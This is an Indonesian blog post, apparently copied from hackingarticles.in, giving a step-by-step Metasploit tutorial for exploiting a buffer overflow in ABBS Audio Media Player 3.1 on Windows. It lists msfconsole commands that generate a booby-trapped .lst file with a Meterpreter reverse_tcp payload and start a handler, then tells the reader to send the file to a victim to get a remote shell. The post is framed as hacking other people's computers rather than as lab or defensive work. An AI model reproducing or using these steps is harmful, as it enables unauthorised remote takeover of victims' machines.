Hack Windows Menggunakan ABBS Audio Media Player .LST Buffer Overflow

di 00.15 on Selasa, 09 Juli 2013
Teknik ini meng-eksploitasi buffer overflow di ABBS Audio Media Player. Kerentanan terjadi ketika menambahkan LST. Memungkinkan eksekusi kode dengan privileges dari user menjalankan aplikasi. Teknik ini telah berhasil diuji pada ABBS Audio Media Player 3.1 di atas Windows XP SP3 dan Windows 7 SP1.

Exploit Targets

ABBS Audio Media Player 3.1

Requirement

Attacker : Kali Linux
Victim PC : Windows 7
Buka kali linux dan ketik : msfconsole

sekarang ketik : use exploit/windows/fileformat/abbs_amp_ lst
msf exploit (abbs_amp_ lst)>set payload windows/meterpreter/reverse_tcp
msf exploit (abbs_amp_ lst)>set lhost 192.168.1.115 ( Ip address anda )
msf exploit (abbs_amp_ lst)>exploit
Setelah berhasil menghasilkan lst, maka akan otomatis disimpan di folder : /root/.msf4/local/msf.lst
Sekarang kita perlu mengatur handler untuk menangani koneksi berbalik setelah dikirim oleh korban ketika exploit berhasil dijalankan.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.115
exploit
Sekarang kirim file msf.lst kepada korban, setelah korban men-download dan membukanya. Sekarang Anda dapat mengakses shell meterpreter pada komputer korban.


Semoga bermanfaat.
^_^
sumber : hackingarticles.in


0 komentar:

Posting Komentar

Terima kasih atas kunjungannya.
^_^

Pengunjung yang baik hati selalu meninggalkan komentarnya.

Langganan: Posting Komentar (Atom)